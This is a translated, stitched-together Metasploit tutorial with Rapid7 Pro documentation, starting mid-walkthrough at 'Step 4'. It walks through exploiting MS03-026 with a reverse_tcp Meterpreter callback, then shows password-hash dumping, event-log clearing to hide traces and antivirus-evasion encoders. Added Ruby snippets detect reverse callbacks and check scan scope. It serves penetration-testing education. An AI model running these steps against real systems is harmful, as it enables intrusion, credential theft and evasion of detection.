
Working with Metasploit. What is Metasploit and how does it work? General module settings

Original: Penetration Testing with Metasploit Framework
Posted by Dinesh Shetty
Publication date: July 2011
Translation: V. Semenenko
Translation date: July 2011

Introduction

Surely, when I say “penetration testing tool”, the first name that comes to your mind is Metasploit. And no wonder! It is one of the largest projects in the world written in Ruby: its total line count exceeds 700,000. Today it is the de facto standard for pentesting and vulnerability research. The program is downloaded more than a million times a year, and the project also has the world's largest publicly available database of verified, high-quality exploits.

In the msfconsole console, type search dcerpc to list all exploits whose names match the pattern dcerpc. All of them can be used to gain access to the server through vulnerabilities reachable on port 135. As soon as we enter this command, msfconsole prints the list of matching exploits, as shown in Figure 3.

Step 4:

Now that we have a list of RPC exploits in front of us, we need more complete information about each of them before putting one into practice. To get a detailed description of a specific exploit, we use the command info exploit/windows/dcerpc/ms03_026_dcom. What do we get? A description of the possible targets, the exploit's requirements, a detailed description of the vulnerability the exploit uses, and links where we can find more information.

Step 5:

In general, the use command enters the context of the specified exploit. In our case, we run use exploit/windows/dcerpc/ms03_026_dcom to select this exploit.

As you can see in Figure 4, after running use exploit/windows/dcerpc/ms03_026_dcom the command prompt changed from msf > to msf exploit(ms03_026_dcom) >. This means that we have entered the temporary context of this exploit.

Step 6:

Now we need to configure the exploit's options as the current scenario requires. The show options command lists the options of the currently selected exploit. In our case, RPORT is already set to 135. All we have to do is set RHOST, which is done with the set RHOST command.

We enter set RHOST 192.168.42.129 on the command line and see the result: the IP address of the remote host is set to 192.168.42.129, as in the screenshot.

Step 7:

The last thing we need to do before running the exploit is to select a payload for it. All available payloads can be listed with the show payloads command.

As you can see in the screenshot, show payloads lists every payload compatible with the exploit we have chosen. For our case we use the reverse TCP Meterpreter, selecting it with set PAYLOAD windows/meterpreter/reverse_tcp; once the target is successfully exploited, this payload gives us a command shell on the remote machine. We then run show options again to make sure that every required field has an appropriate value so that the exploit can run successfully.

Note that the payload's LHOST option is not set. So we need to set it to our local IP address (for example, 192.168.42.128) with the command set LHOST 192.168.42.128.

Step 8:

Now that everything is ready and the exploit is configured properly, it's time to run it.

We can use the check command to find out whether the victim machine is actually vulnerable before running the exploit. Not every exploit implements this option, and the screenshot clearly shows that ours is one of those that do not.

It is still worth trying in any case. It is a useful aid from the framework because it lets you confirm that the remote machine has not already been patched against the vulnerability you are about to exploit. In other words, it saves you from running the exploit against a remote machine needlessly.

In our case, as you can see in the screenshot, the exploit we selected does not support check.

The exploit command launches the selected exploit, which performs all the necessary actions so that the payload can be executed on the remote machine.

The screenshot shows that the exploit ran successfully against the remote machine with IP address 192.168.42.129 through the vulnerable RPC service on port 135. Success is indicated on the command line by the prompt changing to meterpreter >.
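From the defender's side, the sequence just described leaves a recognisable trace in network flow logs: an allowed inbound connection to the RPC service on TCP/135, followed shortly by the victim connecting back to the very same host, which is what a reverse_tcp payload does. The following is an added example, not code from the article or from Metasploit; the flow-log line format, the 120-second window and the callback port 4444 are constructed assumptions.

```ruby
require 'time'

# Constructed flow-log format (an assumption, not any real product's format):
#   <ISO8601 time> TCP <src ip>:<src port> -> <dst ip>:<dst port> <ALLOW|DENY>
LOG_RE = /\A(?<ts>\S+) TCP (?<src>[\d.]+):(?<sport>\d+) -> (?<dst>[\d.]+):(?<dport>\d+) (?<action>\w+)\z/

# Constructed sample log. Line 1: the attacking host (192.168.42.128, the LHOST
# from the article) reaches the RPC endpoint mapper on the victim (192.168.42.129,
# the RHOST). Line 2: two seconds later the victim calls back to the attacker,
# as a reverse_tcp payload would (4444 is an assumed callback port). Lines 3-5 are
# benign noise: an unrelated DNS lookup, a blocked TCP/135 probe, and an outbound
# connection to a peer that never had an allowed TCP/135 connection to the victim.
SAMPLE_LOG = <<~LOG
  2011-07-12T10:15:01Z TCP 192.168.42.128:51522 -> 192.168.42.129:135 ALLOW
  2011-07-12T10:15:03Z TCP 192.168.42.129:1045 -> 192.168.42.128:4444 ALLOW
  2011-07-12T10:16:10Z TCP 192.168.42.129:1046 -> 192.168.42.1:53 ALLOW
  2011-07-12T10:20:00Z TCP 192.168.42.50:40000 -> 192.168.42.129:135 DENY
  2011-07-12T10:30:00Z TCP 192.168.42.129:1047 -> 192.168.42.50:8080 ALLOW
LOG

# Parse one log line into a hash; return nil for lines that do not match the format.
def parse_flow(line)
  m = LOG_RE.match(line.strip)
  return nil unless m
  { time: Time.iso8601(m[:ts]), src: m[:src], sport: m[:sport].to_i,
    dst: m[:dst], dport: m[:dport].to_i, action: m[:action] }
end

# Flag every case where host B connects back to host A within `window` seconds
# after A opened an allowed connection to B's TCP/135. Denied flows are ignored:
# a blocked exploit attempt cannot have delivered a payload.
def detect_reverse_after_rpc(lines, window: 120)
  pending = {} # [attacker, victim] => time of the allowed inbound TCP/135 connection
  alerts = []
  lines.each do |line|
    f = parse_flow(line)
    next if f.nil? || f[:action] != 'ALLOW'
    if f[:dport] == 135
      pending[[f[:src], f[:dst]]] = f[:time]
      next
    end
    t0 = pending[[f[:dst], f[:src]]] # is this the victim calling the attacker back?
    next unless t0 && f[:time] >= t0 && f[:time] - t0 <= window
    alerts << { victim: f[:src], attacker: f[:dst], callback_port: f[:dport],
                seconds_after_rpc: f[:time] - t0 }
  end
  alerts
end

if __FILE__ == $PROGRAM_NAME
  detect_reverse_after_rpc(SAMPLE_LOG.lines).each do |a|
    puts "ALERT: #{a[:victim]} connected back to #{a[:attacker]}:#{a[:callback_port]} " \
         "#{a[:seconds_after_rpc].to_i}s after an inbound TCP/135 connection"
  end
end
```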

Step 9:

Now that an additional connection has been established between the victim and our machine, we need to take control of the server. We can use the help command to get a list of all the commands we can run on the remote server.

Below are the results of some meterpreter commands:

  • ipconfig - shows the network interface configuration of the remote machine;
  • getuid - displays the user account the Meterpreter server is running as;
  • hashdump - dumps the password hashes from the SAM database;
  • clearev - clears the event logs on the remote machine, erasing traces of your presence that you may have left there.

Thus, we successfully used the framework to gain access to a remote server running Windows 2003 Server on it. We've given ourselves the ability to run commands in a shell, which gives us full control of the remote machine and the ability to run whatever tasks we want on it.

Potential uses of the Metasploit framework:

  • in pentesting it can be used to produce reports, in conjunction with automated vulnerability scanners. With the framework you can determine whether reported vulnerabilities are really dangerous and whether they can actually be used to penetrate the system.
  • it can be used to test the new exploits that appear literally every day. You can do this on a local server set up specifically for the purpose and quickly check whether a new exploit is effective.
  • it is also a great tool for verifying that your IDS is configured properly and reacts to an attack as expected.

Conclusion

This article is only a superficial overview of using the framework: it shows how to perform a general check of a system for vulnerabilities. Even the initial experience with Metasploit gained in this article will help you understand how exploits work, which in turn is a good foundation for writing your own exploits and for performing pentesting tasks at an ever higher level.

We have written many articles on hacking using Metasploit, including how to leave no traces, about studying the internal architecture of a site, as well as a lot of cheat sheets on commands and scripts.

With this guide we begin a comprehensive series of articles on learning and using Metasploit. This first, introductory part briefly covers the basics of Metasploit, one of the most powerful hacking platforms on planet Earth.

Origin and installation of Metasploit

Metasploit is an open source project started by the hacker HD Moore in 2003. It was originally written in Perl, but in 2007 it was completely rewritten in Ruby. In 2009 it was acquired by Rapid7, a company specializing in information security services, which also produces the Nexpose vulnerability scanner.

Metasploit version 4.12 is already included in the Kali Linux distribution. It is also built into BackTrack. If you are using a different Linux distribution or macOS, you will have to download it from the Rapid7 site.

If you are using Windows, then you will also have to download Metasploit from the site Rapid7, but we do not recommend running it in Windows. You can certainly do this, but many of the features we'll cover in this article simply won't work there.

Metasploit comes in several versions, including Metasploit Pro (the fully commercial version) and the Community Edition (free). The latter is built into Kali. We will focus on the Community Edition, because we think most of you won't buy the $30,000 Pro version.

Ways to use Metasploit

Metasploit can be used in several ways. The most common method, which we use all the time, is the interactive Metasploit console. It is started by entering msfconsole at the Kali command line. There are also several other methods.

Msfcli

Let's start with the fact that you can use Metasploit from the Kali command line, in msfcli mode. At first glance it seems that when we are in the console we are using the command line. In reality, we are using an interactive console with its own keywords and commands. When we work from msfcli, we actually use the Linux command line.

To get information about all the available msfcli commands, type in the console:

Kali > msfcli -h

Now, to run an exploit from msfcli, type a command of the following form (the angle-bracket fields are placeholders that you fill in):

Kali > msfcli <exploit> payload=<payload> rhost=<target IP> lhost=<your IP> E

Here "E" is short for "Execute".

In our article on creating payloads that evade antivirus programs we use the msfencode and msfpayload commands in command-line mode (msfcli).

The disadvantage of msfcli is that it is not as well supported as msfconsole, and you are limited to a single shell, which makes some of the more advanced exploits impossible.

Armitage

If you want to use Metasploit with a graphical user interface (GUI), there are several options. For example, Raphael Mudge developed Armitage (named after a main character of the highly original sci-fi hacking novel Neuromancer, a must-read for every hacker who enjoys the genre).

To start Armitage in Kali, just enter:

Kali > armitage

If Armitage cannot connect, try the following commands (the service command takes the service name first and the action second):

Kali > service postgresql start
Kali > service metasploit start
Kali > service metasploit stop

Armitage is a graphical front end for Metasploit built on a client-server architecture: you run Metasploit as a server, and Armitage becomes its client, giving you full access to Metasploit's functions through a fully functional, though not intuitive, GUI. If you really need a GUI to feel comfortable, by all means use Armitage. But mastering the command line is practically a vital necessity for any self-respecting hacker.

Modules

Metasploit has six different types of modules:

  1. payloads
  2. exploits
  3. post
  4. nops
  5. auxiliary
  6. encoders

Payloads are the code that we leave on the compromised system. Some call them listeners, rootkits, etc.; in Metasploit they are called payloads. Payloads include command shells, Meterpreter and others. They come in different types, for example staged, inline, NoNX (bypasses the "No Execute" feature of some modern processors), PassiveX (bypasses firewall rules for outgoing traffic), IPv6 and others.

Exploits are the code that takes advantage of a vulnerability or flaw in a system. This code is very specific: there are exploits for particular operating systems, service packs (SPs), services, ports and even applications. They are also classified by operating system, so a Windows exploit does not work on Linux and vice versa.

Post modules are the ones we use for post-exploitation actions on a system (i.e. after gaining access to it).

Nops is short for No OPerationS. On x86 family processors a NOP is usually the byte 0x90, which simply means "do nothing". NOPs can be critical in buffer overflow attacks. We can list the nop modules with the show command:

msf > show nops

Auxiliary includes the many modules (695) that do not fit into any of the other categories. These include things like fuzzers, scanners, DoS (denial of service) attack modules and much more. For more detail I refer you to our article on auxiliary modules.

Encoders are modules that allow us to encode our payloads in different ways to bypass antivirus software and other security systems. We can see the encoders by typing:

msf > show encoders

As you can see, Metasploit has quite a few encoders built in. One of our favorites is shikata_ga_nai. It XOR-encodes the payload, which helps to deceive antivirus programs and other security systems.

Search

A search option appeared in Metasploit 4. Previously you had to use msfcli and the grep command to find modules. Now Rapid7 has added keyword search and some other features. The addition was very timely, because Metasploit had grown significantly and an ordinary grep search was no longer enough to find anything among more than 1,400 exploits.

Keyword search allows you to perform both simple searches and more detailed search queries. For example, we can define the type of module we want to find using the type keyword:

msf > search type:exploit

If we do this then Metasploit will return us 1295 exploits. Not very useful.

But if we know that we want to attack a Sun Microsystems machine running Solaris (Sun UNIX), we can refine our search and look only for Solaris exploits. For this we use the platform keyword.

msf > search type:exploit platform:solaris

We have now narrowed our search to those few exploits that will work against Solaris.

To refine the search further, let's assume we want to attack Solaris RPC (sunrpc) and therefore need to see only the exploits that target this specific service. We add the keyword sunrpc to our search query, as shown below:

msf > search type:exploit platform:solaris sunrpc

As you can see, this narrowed the search results down to five exploit modules!
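The narrowing shown above (type keyword, then platform keyword, then a bare term that is matched against the module's name and description, all ANDed together) can be reproduced outside msfconsole to see how the query is interpreted. The following is an added example, not Metasploit's own search code: it parses a query of that form and runs it over a constructed module index in which the three solaris module names are invented for the example and the descriptions are paraphrased.

```ruby
# Constructed module index. The windows/dcerpc, ms08_067, meterpreter, hashdump and
# shikata_ga_nai names are real modules mentioned in the article (descriptions
# paraphrased); the three solaris entries are hypothetical names made up here.
MODULE_INDEX = [
  { name: 'exploit/windows/dcerpc/ms03_026_dcom', type: 'exploit', platform: 'windows',
    desc: 'MS03-026 Microsoft RPC DCOM interface overflow' },
  { name: 'exploit/windows/smb/ms08_067_netapi', type: 'exploit', platform: 'windows',
    desc: 'MS08-067 Microsoft Server Service relative path stack corruption' },
  { name: 'exploit/solaris/sunrpc/example_sadmind', type: 'exploit', platform: 'solaris',
    desc: 'Hypothetical Solaris sadmind sunrpc overflow' },
  { name: 'exploit/solaris/sunrpc/example_ypupdated', type: 'exploit', platform: 'solaris',
    desc: 'Hypothetical Solaris ypupdated RPC command execution' },
  { name: 'exploit/solaris/telnet/example_login', type: 'exploit', platform: 'solaris',
    desc: 'Hypothetical Solaris telnet login bypass' },
  { name: 'auxiliary/scanner/portscan/tcp', type: 'auxiliary', platform: 'multi',
    desc: 'TCP port scanner' },
  { name: 'payload/windows/meterpreter/reverse_tcp', type: 'payload', platform: 'windows',
    desc: 'Windows Meterpreter, reverse TCP stager' },
  { name: 'post/windows/gather/hashdump', type: 'post', platform: 'windows',
    desc: 'Windows gather local user account password hashes' },
  { name: 'encoder/x86/shikata_ga_nai', type: 'encoder', platform: 'multi',
    desc: 'Polymorphic XOR additive feedback encoder' },
].freeze

# Keywords this example understands; anything else is treated as a bare search term.
KEYWORDS = %w[type platform name].freeze

# Split a query such as "type:exploit platform:solaris sunrpc" into keyword
# filters (key => list of accepted values) and bare terms. Repeating a keyword
# ORs its values; all bare terms must match (AND), as in the article's narrowing.
def parse_query(query)
  filters = Hash.new { |h, k| h[k] = [] }
  query.split.each do |token|
    key, value = token.split(':', 2)
    if value && KEYWORDS.include?(key)
      filters[key.to_sym] << value.downcase
    else
      filters[:terms] << token.downcase # bare words match name or description
    end
  end
  filters
end

# Return the modules of `index` that satisfy every filter in `query`.
def search_modules(index, query)
  f = parse_query(query)
  index.select do |m|
    haystack = "#{m[:name]} #{m[:desc]}".downcase
    (f[:type].empty? || f[:type].include?(m[:type])) &&
      (f[:platform].empty? || f[:platform].include?(m[:platform])) &&
      f[:name].all? { |n| m[:name].include?(n) } &&
      f[:terms].all? { |t| haystack.include?(t) }
  end
end

if __FILE__ == $PROGRAM_NAME
  ['type:exploit', 'type:exploit platform:solaris',
   'type:exploit platform:solaris sunrpc'].each do |q|
    hits = search_modules(MODULE_INDEX, q)
    puts "#{q.ljust(40)} -> #{hits.size} module(s)"
    hits.each { |m| puts "    #{m[:name]}" }
  end
end
```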

Metasploit has many more possibilities that we will continue to explore in future articles. Try some of the Metasploit hacks described in other posts on the site. Be sure to come back! You will study Metasploit and learn to hack like a pro!

Disclaimer: This article is written for educational purposes only. The author and publisher did not publish it for malicious purposes. If readers use the information for personal gain, the author and publisher are not responsible for any harm or damage caused.

The first thing to do: if you haven't downloaded Metasploit yet, do that now. If Metasploit is already installed on your computer, congratulations! You can start working.

About Metasploit

Metasploit is a platform for testing, finding and exploiting vulnerabilities. It includes the Metasploit Framework and its commercial counterparts: Metasploit Pro, Express, Community and Nexpose Ultimate.

Metasploit framework

The Metasploit Framework is the basis on which the commercial products are built. It is an open source project that provides the infrastructure, content and tools to conduct penetration tests and extensive security audits. Thanks to the open source community and its own hard-working content team, new modules are added regularly, which means they become available to you immediately after publication.

There are quite a few resources on the Internet that can help you learn how to use the Metasploit Framework. However, we strongly recommend that you read the official documentation, which is maintained by the Rapid7 team.

If you can't find what you need, let us know and we'll add the information you need.

Metasploit Pro and other commercial versions

The commercial versions of Metasploit, which include Pro, Express, Community and Nexpose Ultimate, are available for users who prefer a web-based penetration testing interface. In addition to the web interface, some commercial editions provide features that are not available in the Metasploit Framework.

Most of the additional features are aimed at automating and optimizing common testing tasks, such as vulnerability testing, social engineering, and brute-force attack techniques.

If you use the command line but still want access to the commercial features, don't worry. Metasploit Pro includes a console that is very similar to msfconsole, except that it gives access to most of Metasploit Pro's features from the command line.

Launching Metasploit

Rapid7 provides commercial and open source versions of Metasploit for Linux and Windows operating systems.

You can download and run the file to install Metasploit Pro on your local computer or on a remote host. Regardless of where you install Metasploit Pro, you can access the interface through a web browser. Metasploit uses a secure connection to the server.

If you have installed Metasploit Pro on a web server, users can use a web browser to access the interface from anywhere. Users need to know the server address and port. By default, the Metasploit service uses port 3790. You can change the port that Metasploit uses during the installation process.

If Metasploit is running on your local machine, you can use localhost and port 3790 to access Metasploit Pro. For example, enter https://localhost:3790 in the browser's address bar to load the UI.

For more information about installation, see the section "Installing the Metasploit Framework".

Metasploit Pro Components

Metasploit Pro consists of several components that provide a complete package of testing tools. The following components are included with Metasploit Pro.

Metasploit framework

Metasploit Framework is an open source testing framework that provides access to a variety of applications, operating systems, and platforms. You can use the Metasploit Framework to create additional custom security tools or write your own code for new vulnerabilities.

The Metasploit team regularly releases updates that contain new modules and updates that contain fixes and improvements for Metasploit Pro.

Modules

A module is a single piece of code or software that extends the functionality of the Metasploit Framework. The modules automate the functionality provided by the Metasploit Framework.
There are modules: exploit, payload, NOP, post-exploitation module and others. The module type determines its purpose.

Services

Metasploit uses the following services:

  • PostgreSQL runs the database that Metasploit Pro uses to store project data.
  • Ruby on Rails runs the Metasploit Pro web interface.
  • The Pro service (or Metasploit service) runs Rails, the Metasploit Framework and the Metasploit RPC server.

Web interface

A web interface is available for working with Metasploit Pro. To open it, start your browser and go to https://localhost:3790.

Command Line Interface

The Pro Console lets you work with Metasploit Pro from the command line.

Basic concepts and terms

To introduce you to Metasploit Pro, here are some concepts and terms you need to understand:

  • Auxiliary module: A module that does not carry a payload. Examples of auxiliary modules are scanners, denial of service attacks, etc.
  • Bind shell payload: A payload that opens a listener on the exploited system and waits for the attacker to connect to it.
  • Database: Stores host data, system logs, collected information and report data.
  • Discovery scan: A Metasploit scan that combines Nmap with various Metasploit modules.
  • Exploit: A program that takes advantage of a specific vulnerability and gives an attacker access to the target system. An exploit usually carries a payload and delivers it to the target. For example, one of the most common exploits is MS08-067, which targets a Windows service vulnerability and allows remote code execution.
  • Exploit module: A module that executes a sequence of commands to exploit a vulnerability in a system or application and gain access to the target system. In short, an exploit creates a session. Exploit modules include buffer overflows, code injection and web application exploits.
  • Listener: A listener waits for an incoming connection from an exploited target or from the attacking machine and manages that connection.
  • Meterpreter: An advanced, multifunctional payload that provides an interactive shell. From the Meterpreter shell you can download files, obtain password hashes for user accounts, etc. Meterpreter runs entirely in memory, so most intrusion detection systems do not see it.
  • Module: A standalone piece of code that extends the functionality of the Metasploit Framework. There are different types of modules: exploit, auxiliary, post-exploitation and others. The module type determines its purpose. For example, any module that can open a shell on the target is called an exploit. MS08-067 is a popular exploit module.
  • Payload: The actual code that runs on the target system after the exploit successfully compromises it. The payload defines how you connect to the shell and what you do on the target system once you control it. A payload can be a reverse shell or a bind shell; the main difference between the two is the direction of the connection.
  • Post-exploitation module: A module that lets you collect more information about, or gain further access to, an exploited target system. Examples include application and service enumerators.
  • Project: A container for the targets, tasks, reports and data that belong to a test. A project contains a workspace that is used to create scans and configure tasks. Every penetration test runs inside a project.
  • Reverse shell payload: A shell that connects back to the attacking machine.
  • Shell: An interface that provides access to a remote target.
  • Shellcode: A set of instructions that an exploit uses as its payload.
  • Task: An action that Metasploit can perform, such as scanning, exploitation or reporting.
  • Workspace: The same as a project, except that the term is used only when working with the Metasploit Framework.
  • Vulnerability: A security flaw that allows an attacker to compromise a target. Compromise can lead to privilege escalation, unauthorized access to data, theft of passwords and buffer overflows.

How Metasploit Pro works

The overall penetration testing process can be divided into several stages or phases. Depending on the methodology you use, a penetration test can involve anywhere from four to seven phases. The names of the phases vary, but they generally consist of reconnaissance, scanning, exploitation, post-exploitation, maintaining access, cleanup and reporting.

Metasploit Pro can work based on different stages of testing. The workflow generally includes the following steps:

  1. Create a project: Create a project to store the data collected from your targets.
  2. Gather information: Use a discovery scan, Nexpose or imported data to provide Metasploit Pro with host data, which helps identify vulnerabilities.
  3. Exploit: Use automated or manual exploits to launch attacks against known vulnerabilities and gain access to targets.
  4. Post-exploitation: Use post-exploitation modules or interactive sessions to gather more information about compromised targets. Metasploit Pro provides several tools for interacting with open sessions on a live machine. For example, you can look at shared file systems on compromised targets to find information about internal applications, and use the password and hash collection feature.
  5. Brute-force attack: Run a brute-force attack with the collected passwords to discover valid logins.
  6. Clean up open sessions: Close the open sessions on exploited targets to remove any evidence of the data that may have been left on the system. This process restores the original settings on the target system.
  7. Generate a report: Produce a report with detailed findings. Metasploit Pro provides several report types that you can use to customize the report data. The most commonly used is the audit report, which gives a detailed assessment of the hosts and credentials captured in the project.

Access to Metasploit Pro via web interface

To use the web interface to work with Metasploit Pro, open your browser and go to https://localhost:3790.

If Metasploit is running on a remote computer, replace localhost with the address of that computer.

To log into the web interface, you need the username and password of the account created when you activated the license key for Metasploit Pro. If you can't remember the password you set for your account, you will need to reset it.

Supported Browsers

If the user interface does not display all elements as expected, please ensure that you are using one of the supported browsers listed below:

  • Google Chrome 10+
  • Mozilla Firefox 18+
  • Internet Explorer 10+
  • Iceweasel 18+

Accessing Metasploit Pro from the Command Line

Pro Console provides Metasploit Pro functionality through a command line interface and serves as an alternative to Metasploit Web UI. If you're a traditional Metasploit Framework user, then Pro Console will give you something similar to the Msf console.

You can use Pro Console to perform the following tasks:

  • Creation and management of projects.
  • Scanning and listing hosts.
  • Import and export of data.
  • Setting up and launching modules.
  • Launching automated exploits.
  • View information about hosts.
  • Collecting data from systems in use.

You cannot perform every task through the Pro Console. Unsupported tasks: reporting, social engineering, running MetaModules, setting up task chains, launching brute-force attacks and scanning web applications.

Running Pro Console on Windows

To launch the console on Windows, select Start > Metasploit > Metasploit Console.

You can also launch the console from the command line. To launch the console from the command line, enter the following:

$ cd /metasploit
$ console.bat

Running Pro Console on Linux

To launch the console on Linux, enter the following:

$ cd /opt/Metasploit/
$ sudo msfpro

Projects page

Now that you know some of the basics of Metasploit, let's take a closer look at Metasploit Pro. After logging into Metasploit Pro, the first screen that opens is the Projects page. Here are all the projects currently stored in Metasploit Pro. You also have access to news about products and the launch of wizards and tools.

No matter where you are in the application, you can choose Projects > Show all projects from the toolbar or click on the Metasploit Pro logo to go to the page (see below):

Toolbar

The main toolbar is located at the top of the web interface. It is accessible from anywhere in Metasploit Pro. You can use the toolbar to access the project menu, account settings, and admin menu.

Quick Start Wizard

Each Quick Start Wizard provides a guided interface that walks you through a penetration testing task, such as scanning and exploiting a target, creating social engineering campaigns, scanning and exploiting web applications, and validating vulnerabilities.

You can click on any of the Quick Start Wizard icons to launch the guided interface.

Product news

This section contains the latest news about Rapid 7. If you want to use the latest modules from Rapid 7 and the community, the Product News panel is a great place to learn more about the latest updates.

If for some reason you don't want to see the news panel, you can hide it so that it doesn't appear on the projects page.

Creating a Project

Now that you're familiar with the projects page, let's try creating a project.

A project contains a workspace and data storage and lets you organize your targets into logical groups. You will often have different requirements for different subnets in your organization, so having multiple projects to represent those requirements is a great idea.

For example, you can create a project for the HR department and another project for the IT department. Your requirements for these departments may be very different, so it is logical to distribute goals into different projects. You can create separate reports for each department to benchmark and share your findings with the organization.

Creating a project is simple. Click the New Project button on the Projects page or select Project > New Project on the main toolbar.

When the New Project page appears, all you need to do is provide a name. If you want to customize the project, you can add a description, specify the network range and assign user access levels.


Receiving target data

The next thing to do is add data to the project. There are several ways to do this:

  • Run a discovery scan.
  • Import data you already have.

Scan targets

Scanning is the process of examining hosts and listing open ports to gain visibility into the services running on the network. Scanning allows you to identify active systems with services through which you can communicate. This allows you to develop an effective plan of attack.

Metasploit has a built-in discovery scanner that uses Nmap to perform TCP port scans and collect additional information about target hosts.

By default, the discovery scan also includes a UDP scan, which sends UDP probes to the most common UDP ports, such as NETBIOS, DHCP, DNS and SNMP. The scan checks about 250 ports that are typically used by external services.

During the scanning process, Metasploit Pro automatically saves host data in the project. You can view host data to get a better understanding of the network topology and determine the best use for each target. The more information you can gather about a target, the more accurately you can tailor a test for it.

Starting a scan is not difficult. Within the project, click the Scan button.

When the New Discovery Scan form appears, enter the hosts you want to scan in the "Target addresses" field. You can enter a single IP address, an IP range or a standard CIDR entry. Each element must appear on a new line.

You can start a scan with just one target range. However, if you want to customize your scanning in more detail, you can use the advanced options. For example, you can specify the hosts you want to exclude from scanning and set the scanning speed.
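Before launching a scan, the target field format just described (one entry per line: a single address, an address range or a CIDR block) together with the exclusion option can be checked against the scope you are actually authorized to test. The following is an added example, not Metasploit Pro's own code: it expands such a list, removes excluded hosts and reports anything outside an authorized scope; the sample lists and authorized range are constructed, and the range syntax a-b with two full addresses is an assumption about the accepted form.

```ruby
require 'ipaddr'
require 'socket'
require 'set'

IPV4 = /\d{1,3}(?:\.\d{1,3}){3}/

# Expand one line of the target field into IPv4 addresses as integers.
# Accepted forms: "192.168.42.129", "192.168.42.1-192.168.42.3", "10.0.0.0/30".
def expand_entry(entry)
  text = entry.strip
  case text
  when /\A(#{IPV4})-(#{IPV4})\z/
    first, last = IPAddr.new($1).to_i, IPAddr.new($2).to_i
    raise ArgumentError, "range start is after its end: #{text}" if first > last
    (first..last).to_a
  when %r{\A#{IPV4}/\d{1,2}\z}
    IPAddr.new(text).to_range.map(&:to_i) # includes network and broadcast addresses
  when /\A#{IPV4}\z/
    [IPAddr.new(text).to_i]
  else
    raise ArgumentError, "unrecognised target entry: #{text.inspect}"
  end
end

# Expand a whole multi-line field (blank lines ignored) into a sorted list without duplicates.
def expand_targets(text)
  text.lines.map(&:strip).reject(&:empty?).flat_map { |e| expand_entry(e) }.uniq.sort
end

def to_dotted(int)
  IPAddr.new(int, Socket::AF_INET).to_s
end

# Apply the exclusion list, then split what remains into hosts inside the
# authorized scope (safe to scan) and hosts outside it (must not be scanned).
def plan_scan(targets_text, excludes_text: '', authorized_text:)
  allowed = expand_targets(authorized_text).to_set
  remaining = expand_targets(targets_text) - expand_targets(excludes_text)
  in_scope, out_of_scope = remaining.partition { |ip| allowed.include?(ip) }
  { scan: in_scope.map { |i| to_dotted(i) }, out_of_scope: out_of_scope.map { |i| to_dotted(i) } }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed input: the article's lab host, a small range and a /30 that lies
  # outside the (constructed) authorized scope of 192.168.42.0/24.
  plan = plan_scan("192.168.42.129\n192.168.42.1-192.168.42.3\n10.0.0.0/30\n",
                   excludes_text: "192.168.42.2\n", authorized_text: "192.168.42.0/24\n")
  puts "scan:         #{plan[:scan].join(', ')}"
  puts "out of scope: #{plan[:out_of_scope].join(', ')}"
end
```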


Import data

If you use a vulnerability scanner, you can import the vulnerability report into the Metasploit project. Imported vulnerability data also includes host metadata that can be analyzed to identify additional attack paths. Metasploit supports several vulnerability scanners, including Nessus, Qualys, and Core Impact.

You can also export and import data from one Metasploit project to another. This allows you to share results between projects and other team members.

To import data into your project, click the Import button. When the data import page appears, select import from NeXpose or import from file. Depending on the option you select, the form will display the options you need to configure to import the file.

For example, if you want to import from NeXpose, you need to select the console you want to use to run the scan or import the site. If you want to import a file, you need to browse to the file location.

View and manage host data

You can view host data at the project level or at the host level. At the project level, Metasploit provides a view of all the hosts that have been added to the project.

To access project-level viewing, select Analysis > Hosts.

The project level view initially shows a list of hosts with the number of ports and services for each host. You can also view all records, services, vulnerabilities, and received data for a project. To access them, click on their tabs.

To view the details of a host, click the host's IP address. This is a good way to see the vulnerabilities and credentials of a specific host.

Run a vulnerability scan

After adding target data to your project, you can run a vulnerability scan to pinpoint security flaws that could be exploited. Scanners check for known vulnerabilities and configuration errors that exist on target machines. This information will help you determine possible directions and plans of attack.
Integration with NeXpose allows you to run vulnerability scans directly from the Metasploit web interface. NeXpose scanning identifies active services, open ports, and applications that are running on each host; NeXpose attempts to identify vulnerabilities that may exist based on known services and applications.
To start a NeXpose scan, click the NeXpose button in the taskbar.

When the NeXpose settings form appears, you need to configure and select the console you want to use to perform the scan. You also need to define the hosts to scan and select one of the available scan templates, which determines the level of auditing to use. For more information about scan templates, see the NeXpose documentation.

To view all potential vulnerabilities that NeXpose has found, select Analysis > Vulnerabilities. You can click on the vulnerability name to view the modules that were used to find it.

Important note on exploitation

Vulnerability scanners are useful tools that can help you quickly find potential security flaws. However, you can also run auxiliary modules, such as the FTP, SMB and VNC scanners, to manually identify potential vulnerabilities that could be exploited. Manual vulnerability analysis is significantly more time-consuming and requires critical thinking and in-depth knowledge on your part, but it will help you create an accurate and effective attack plan.

An easy way to find and exploit vulnerabilities

The easiest way to scan and verify vulnerabilities is the scan wizard, which automates the scanning process for NeXpose and Metasploit Pro users. The wizard provides a guided, user-friendly interface that takes you through the verification process, from importing NeXpose data to automatically exploiting vulnerabilities and sending the verification results back to NeXpose.

If you do not have access to NeXpose and/or Metasploit Pro, you will need to verify vulnerabilities manually. Manual verification requires a little more effort, but gives you much greater control over which vulnerabilities are targeted.

To find out more about vulnerability scanning, see the Metasploit Pro documentation.

Exploitation of known vulnerabilities

Once you have gathered information about your targets and identified potential vulnerabilities, you can move on to the exploitation phase. Exploitation is the process of launching exploits against discovered vulnerabilities. Successful exploitation provides access to target systems so you can obtain password hashes and configuration files.

Metasploit offers two different methods of exploitation: automatic exploitation and manual exploitation.

Automatic exploitation

Automatic exploitation uses cross-referenced open services and vulnerability references to find matching exploits. All matching exploits are added to the attack plan, which determines the exploits that will be launched. The goal of automated exploitation is to obtain a session as quickly as possible by using the data that Metasploit already holds about the target hosts.

To start automatic exploitation, click the Exploitation button in the taskbar.

You must provide the hosts you want to exploit and the minimum reliability for each exploit. The minimum reliability lets you make sure that only safe exploits are run: the higher the reliability level, the less likely it is that the exploits will crash services or otherwise disrupt the target. For descriptions of each reliability rank, go to this page.

Manual exploitation

Manual exploitation provides a more targeted and methodical approach to exploiting vulnerabilities. It lets you run selected exploits one at a time, which is especially useful when there is a specific vulnerability you want to exploit.

For example, if you know that the SMB server on a Windows XP host does not have the MS08-067 patch, you can try running the corresponding module to exploit it.

To search for modules, select Modules > Search and enter the name of the module you want to run. The best way to find a module is to search for the vulnerability reference. For example, if you want to search for MS08-067, you can search for 'ms08-067'. You can also search by the module path: exploit/windows/smb/ms08_067_netapi.

One of the easiest and most convenient ways to find an exploit for a vulnerability is directly from the vulnerability page. To view all vulnerabilities in a project, select Analysis > Vulnerabilities. You can click on a vulnerability name to view the modules that can be used to exploit it.

